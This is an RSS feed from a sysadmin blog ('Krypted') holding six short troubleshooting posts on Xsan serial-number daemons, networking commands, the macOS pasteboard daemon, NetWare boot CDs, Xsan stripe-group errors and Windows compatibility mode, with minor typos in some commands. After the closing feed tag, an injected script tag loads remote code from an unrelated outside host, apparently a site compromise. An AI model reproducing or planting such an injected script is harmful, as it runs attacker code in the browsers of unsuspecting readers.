<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; troubleshooting</title>
	<atom:link href="http://krypted.com/tag/troubleshooting/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Xsan + serialnumberd Troubleshooting</title>
		<link>http://krypted.com/mac-os-x-server/xsan-serialnumberd-troubleshooting/</link>
		<comments>http://krypted.com/mac-os-x-server/xsan-serialnumberd-troubleshooting/#comments</comments>
		<pubDate>Wed, 20 Jan 2010 16:00:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[Xsan]]></category>
		<category><![CDATA[daemon]]></category>
		<category><![CDATA[dual nic]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[Final Cut Server]]></category>
		<category><![CDATA[launchctl]]></category>
		<category><![CDATA[multihoming]]></category>
		<category><![CDATA[serialnumberd]]></category>
		<category><![CDATA[SystemStarter]]></category>
		<category><![CDATA[troubleshooting]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5658</guid>
		<description><![CDATA[With Mac OS X 10.5.8 and 10.6.x, Mac OS X Server, Xsan, Final Cut Server and a number of other serialized products were switched to a whole new solution for managing serial numbers: a newly redone serialnumberd. If you run otool against serialnumberd in 10.5.7 and below you&#8217;ll notice no dependencies; it stood alone so [...]]]></description>
			<content:encoded><![CDATA[<p>With Mac OS X 10.5.8 and 10.6.x, Mac OS X Server, Xsan, Final Cut Server and a number of other serialized products were switched to a whole new solution for managing serial numbers: a newly redone serialnumberd. If you run otool against serialnumberd in 10.5.7 and below you&#8217;ll notice no dependencies; it stood alone so to speak. If you run otool against the latest and greatest then you&#8217;ll notice that it has a number of dependencies that run the gambit of otherwise unthinkable services. This caused minor growing pains during the summer with multihomed network connections, maximum number of clients and other aspects of servers with certain solutions, but that got ironed out quickly with the 10.5.8v1.1 and 10.6.1.</p>
<p>But there have been some minor issues I&#8217;ve seen still, mostly due to installer packages not holistically cleaning up old artifacts with regards to daemons that manage serial numbers (likely due to their author being concerned about the potential for other services to have dependencies on them). This is a problem that seems to manifest itself more frequently if you are running both Mac OS X Server and Xsan on the same host (which is basically all metadata controllers, etc) and have upgraded from Xsan 1.x to 2.x and potentially upgraded from Mac OS X 10.4.x to 10.5.x and ultimately to 10.6.x.</p>
<p>The /System/Library/StartupItems/SerialNumberSupport StartupItem initially invoked the SerialNumberSupport daemon. However, that&#8217;s no longer needed for any product that I&#8217;m aware of. Therefore, you can stop it using the SystemStarter command and telling it to &#8217;stop SerialNumberSupport&#8217;:</p>
<blockquote><p>SystemStarter stop SerialNumberSupport</p></blockquote>
<p>SerialNumberSupport overall is deprecated and so if stopping it does not cause any adverse effects but does resolve some form of volume issues you might be having with your Xsan then you can also move it off somewhere that it can&#8217;t be overly troublesome, like your desktop:</p>
<blockquote><p>mv /SystemLibrary/StartupItems/SerialNumberSupport ~/Desktop/SerialNumberSupport.OLD</p></blockquote>
<p>Additionally, since serialnumberd is invoked by com.apple.serialnumberd.plist in /System/Library/LaunchDaemons then in many cases you do not need the /System/Library/LaunchDaemons/com.apple.SNServer.plist. If it is loaded and you are still having problems then try unloading it using launchctl. If your problems are gone then so should the SNServer, so consider moving it using:</p>
<blockquote><p>mv /System/Library/LaunchDaemons/com.apple.SNServer.plist ~/Desktop/com.apple.SNServer.plist.OLD</p></blockquote>
<p>These artifacts are likely left behind for a reason. So before you go removing them, check that a temporary stop of them resolves issues without adversely effecting other services. There is a good reason that not everything gets removed, although sometimes they can have unintended consequences&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/disable-disk-arbitration/" rel="bookmark" title="June 28, 2009">Disable Disk Arbitration</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-enable-and-disable-spotlight/" rel="bookmark" title="November 23, 2008">Mac OS X: Enable and Disable Spotlight</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-systemstarter/" rel="bookmark" title="August 5, 2008">Mac OS X: SystemStarter</a></li>
<li><a href="http://krypted.com/xsan/uninstalling-reinstalling-xsan/" rel="bookmark" title="May 23, 2009">Uninstalling and Reinstalling Xsan</a></li>
<li><a href="http://krypted.com/mac-os-x-server/afp-xsan-failover-tokens/" rel="bookmark" title="January 8, 2007">AFP, Xsan, Failover &amp; Tokens</a></li>
</ul>
<p><!-- Similar Posts took 8.244 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x-server/xsan-serialnumberd-troubleshooting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Simple Networking Commands</title>
		<link>http://krypted.com/mac-os-x/simple-networking-commands/</link>
		<comments>http://krypted.com/mac-os-x/simple-networking-commands/#comments</comments>
		<pubDate>Sat, 10 Oct 2009 15:33:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Network Infrastructure]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[troubleshooting]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4822</guid>
		<description><![CDATA[Troubleshooting the network is faster and more thorough when it is done using the command line. Here are some simple command-line utilities that can perform a variety of tasks that can help when administering many services and multiuser environments:

Whoami lists the user you are currently logged in as from the command line.
Who lists the users [...]]]></description>
			<content:encoded><![CDATA[<p>Troubleshooting the network is faster and more thorough when it is done using the command line. Here are some simple command-line utilities that can perform a variety of tasks that can help when administering many services and multiuser environments:</p>
<ul>
<li><strong>Whoami</strong> lists the user you are currently logged in as from the command line.</li>
<li><strong>Who </strong>lists the users logged onto your system.</li>
<li><strong>Id </strong>shows a list of all defined users and groups whether they are actually logged in.</li>
<li><strong>Groups &lt;<em>userid</em>&gt; </strong>shows a list of all the groups a user is in.</li>
<li><strong>Whois </strong>lists ownership information for domains.</li>
<li><strong>Hostname</strong> lists the name of the computer you are currently working on. You can also use <strong>hostname</strong> to set the name of the computer.</li>
<li><strong>Ifconfig</strong> is used to show you information about your network adapter.</li>
<li><strong>Dig</strong> is a utility for interrogating DNS servers. It is used to ask a DNS server for a type of record and provide the information for the DNS server.</li>
<li><strong>Netstat </strong>is a highly configurable tool that can show you the status of your network interfaces. This can help administrators break down which IP addresses are connecting to servers, the name of the system using the IP address, and the ports users are accessing the server over.</li>
<li><strong>Ping</strong> sends a request to a system. If the system supports the ability to respond, then the system will do so. <strong>Ping</strong> can be used to check the availability of a system and make sure data can reliably make it to the system being pinged.</li>
<li><strong>Traceroute</strong> is a utility for tracing where data goes through the Internet to get to a specified destination. The <strong>traceroute</strong> command is useful when troubleshooting connectivity issues between two locations.</li>
</ul>
<p><strong> </strong><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/the-cut-copy-paste-daemon-in-os-x/" rel="bookmark" title="June 29, 2009">The Cut, Copy &amp; Paste Daemon in OS X</a></li>
<li><a href="http://krypted.com/mac-os-x-server/xsan-serialnumberd-troubleshooting/" rel="bookmark" title="January 20, 2010">Xsan + serialnumberd Troubleshooting</a></li>
<li><a href="http://krypted.com/xsan/xsan-stripe-group-down-errors/" rel="bookmark" title="October 28, 2008">Xsan: Stripe Group Down Errors</a></li>
<li><a href="http://krypted.com/consulting/netware-portlock/" rel="bookmark" title="June 24, 2009">NetWare + Portlock</a></li>
</ul>
<p><!-- Similar Posts took 4.176 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/simple-networking-commands/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Cut, Copy &amp; Paste Daemon in OS X</title>
		<link>http://krypted.com/mac-os-x/the-cut-copy-paste-daemon-in-os-x/</link>
		<comments>http://krypted.com/mac-os-x/the-cut-copy-paste-daemon-in-os-x/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 04:01:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[broken]]></category>
		<category><![CDATA[com.apple.com]]></category>
		<category><![CDATA[copy]]></category>
		<category><![CDATA[cut]]></category>
		<category><![CDATA[no paste]]></category>
		<category><![CDATA[paste]]></category>
		<category><![CDATA[pboard]]></category>
		<category><![CDATA[troubleshooting]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4041</guid>
		<description><![CDATA[Ever seen com.apple.pboard in a launchctl list? Â Wondered what it did? Â This is the infamous clipboard (aka &#8211; pasteboard, or on the iPhone the NSPasteboard server). Â If you unload the pboard entry in launchctl then you will no longer be able to cut, copy and paste. Â pboard relies on the existence of and the accessibility [...]]]></description>
			<content:encoded><![CDATA[<p>Ever seen com.apple.pboard in a launchctl list? Â Wondered what it did? Â This is the infamous clipboard (aka &#8211; pasteboard, or on the iPhone the NSPasteboard server). Â If you unload the pboard entry in launchctl then you will no longer be able to cut, copy and paste. Â pboard relies on the existence of and the accessibility to the user that initiated pboard (ie &#8211; root) to have access to the /tmp folder. Â Therefore, pboard will be wonky without /tmp and without pboard you won&#8217;t be able to paste things. Â So, when troubleshooting cut, copy and paste issues, first verify that /tmp exists and then verify that pboard is running using the following command:</p>
<blockquote><p>launchctl list | grep com.apple.pboard</p></blockquote>
<p>And if it isn&#8217;t running, start it with:</p>
<blockquote><p>launctl start com.apple.pboard</p></blockquote>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x-server/xsan-serialnumberd-troubleshooting/" rel="bookmark" title="January 20, 2010">Xsan + serialnumberd Troubleshooting</a></li>
<li><a href="http://krypted.com/mac-os-x/april-fools-trash-rather-than-cut/" rel="bookmark" title="April 1, 2005">April Fools &#8211; Trash Rather than Cut</a></li>
<li><a href="http://krypted.com/mac-os-x/simple-networking-commands/" rel="bookmark" title="October 10, 2009">Simple Networking Commands</a></li>
<li><a href="http://krypted.com/xsan/xsan-stripe-group-down-errors/" rel="bookmark" title="October 28, 2008">Xsan: Stripe Group Down Errors</a></li>
<li><a href="http://krypted.com/mac-os-x/using-the-cut-command/" rel="bookmark" title="January 17, 2010">Using the cut Command</a></li>
</ul>
<p><!-- Similar Posts took 6.066 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/the-cut-copy-paste-daemon-in-os-x/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>NetWare + Portlock</title>
		<link>http://krypted.com/consulting/netware-portlock/</link>
		<comments>http://krypted.com/consulting/netware-portlock/#comments</comments>
		<pubDate>Wed, 24 Jun 2009 04:02:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Consulting]]></category>
		<category><![CDATA[boot cd]]></category>
		<category><![CDATA[boot disk]]></category>
		<category><![CDATA[netware]]></category>
		<category><![CDATA[portlock boot cd]]></category>
		<category><![CDATA[troubleshooting]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=3993</guid>
		<description><![CDATA[When you run into booting issues with NetWare it&#8217;s often a simple fix. Â Move a file, edit a file, rename a file, etc. Â  But getting to the point where you can actually implement the fix can be a pain. Â The Portlock Boot CD can come in pretty handy at this point. Â It enables you [...]]]></description>
			<content:encoded><![CDATA[<p>When you run into booting issues with NetWare it&#8217;s often a simple fix. Â Move a file, edit a file, rename a file, etc. Â  But getting to the point where you can actually implement the fix can be a pain. Â The <a href="http://www.portlock.com/products/boot_cd/">Portlock Boot CD</a> can come in pretty handy at this point. Â It enables you to mount a file system and edit it even if the host will not boot properly.  It&#8217;s not that I&#8217;m saying that you should invest more money into that crusty old NetWare environment in most cases, but in some cases it can be a saviour&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/windows-server/windows-boot-cds/" rel="bookmark" title="January 17, 2007">Windows Boot CDs</a></li>
<li><a href="http://krypted.com/mac-os-x-server/xsan-serialnumberd-troubleshooting/" rel="bookmark" title="January 20, 2010">Xsan + serialnumberd Troubleshooting</a></li>
<li><a href="http://krypted.com/mac-os-x/simple-networking-commands/" rel="bookmark" title="October 10, 2009">Simple Networking Commands</a></li>
<li><a href="http://krypted.com/xsan/xsan-stripe-group-down-errors/" rel="bookmark" title="October 28, 2008">Xsan: Stripe Group Down Errors</a></li>
</ul>
<p><!-- Similar Posts took 4.115 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/consulting/netware-portlock/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Xsan: Stripe Group Down Errors</title>
		<link>http://krypted.com/xsan/xsan-stripe-group-down-errors/</link>
		<comments>http://krypted.com/xsan/xsan-stripe-group-down-errors/#comments</comments>
		<pubDate>Tue, 28 Oct 2008 21:38:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Xsan]]></category>
		<category><![CDATA[stripe group down]]></category>
		<category><![CDATA[troubleshooting]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=2707</guid>
		<description><![CDATA[If you are getting Stripe Group Down errors in your Xsan logs then this usually means there is a problem with your workstation accessing LUNs in the environment. Â This can be an issue with a given workstation having problems seeing the SAN fabric or it can be a problem with any other system seeing the [...]]]></description>
			<content:encoded><![CDATA[<p>If you are getting Stripe Group Down errors in your Xsan logs then this usually means there is a problem with your workstation accessing LUNs in the environment. Â This can be an issue with a given workstation having problems seeing the SAN fabric or it can be a problem with any other system seeing the fabric. Â You will notice the system having the error indicated in the logs. Â Check Apple System Profiler (keep in mind Apple System Profiler sometimes requires a reboot to refresh the LUNs it has access to via Fibre Channel) to see if the indicated LUNs are present. Â If all LUNs give an error (one per line) that the stripe group is down then you will typically have a bad cable, HBA, OS load or port on the switch (from the workstation or Metadata Controller). Â If the error is intermittent then you may have a short in one of the above devices. Â If all systems show the error then it is more likely the fiber (fibre) channel switch or the LUNs themselves having problems.</p>
<p>Happy troubleshooting!<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x-server/fibre-channel-switches-vs-hubs/" rel="bookmark" title="April 9, 2009">Fibre Channel Switches vs. Hubs</a></li>
<li><a href="http://krypted.com/xsan/xsan-what-is-fiber-channel/" rel="bookmark" title="June 1, 2005">Xsan: What is Fiber Channel</a></li>
<li><a href="http://krypted.com/xsan/xsan-2-no-limits-kinda/" rel="bookmark" title="March 6, 2009">Xsan 2: No Limits (kinda&#039;)</a></li>
<li><a href="http://krypted.com/xsan/zone-defined/" rel="bookmark" title="February 2, 2005">Zone Defined</a></li>
<li><a href="http://krypted.com/uncategorized/xsan-lun/" rel="bookmark" title="July 1, 2005">Xsan: LUN</a></li>
</ul>
<p><!-- Similar Posts took 5.251 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/xsan/xsan-stripe-group-down-errors/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Setting Compatibility Mode for Windows Applications</title>
		<link>http://krypted.com/windows-xp/setting-compatibility-mode-for-windows-applications/</link>
		<comments>http://krypted.com/windows-xp/setting-compatibility-mode-for-windows-applications/#comments</comments>
		<pubDate>Mon, 22 Jan 2007 19:34:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[applications]]></category>
		<category><![CDATA[Compatibility Mode]]></category>
		<category><![CDATA[launch]]></category>
		<category><![CDATA[problem]]></category>
		<category><![CDATA[troubleshooting]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4534</guid>
		<description><![CDATA[Some applications need a little help to run.  If it&#8217;s an older application and it will not launch then think about changing the compatibility mode.  In order to do so, right-click on the application and click on the Compatibility tab.  From here, set the compatibility mode to a previous version of Windows [...]]]></description>
			<content:encoded><![CDATA[<p>Some applications need a little help to run.  If it&#8217;s an older application and it will not launch then think about changing the compatibility mode.  In order to do so, right-click on the application and click on the Compatibility tab.  From here, set the compatibility mode to a previous version of Windows and then try to fire it up.  Might just help&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/windows-xp/windows-xp-reset-product-key/" rel="bookmark" title="October 21, 2008">Windows XP: Reset Product Key</a></li>
<li><a href="http://krypted.com/active-directory/getting-started-with-amazons-ec2-cloud/" rel="bookmark" title="May 1, 2009">Getting Started with Amazon&#039;s EC2 Cloud</a></li>
<li><a href="http://krypted.com/windows-server/bubble-alerts-w-silent-installs/" rel="bookmark" title="September 5, 2009">Bubble Alerts w/ Silent Installs</a></li>
<li><a href="http://krypted.com/windows-server/windows-login-screen-customizations/" rel="bookmark" title="July 29, 2009">Windows Login Screen Customizations</a></li>
<li><a href="http://krypted.com/windows-xp/move-my-documents-in-xp-and-vista/" rel="bookmark" title="July 12, 2009">Move My Documents in XP and Vista</a></li>
</ul>
<p><!-- Similar Posts took 5.235 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/windows-xp/setting-compatibility-mode-for-windows-applications/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>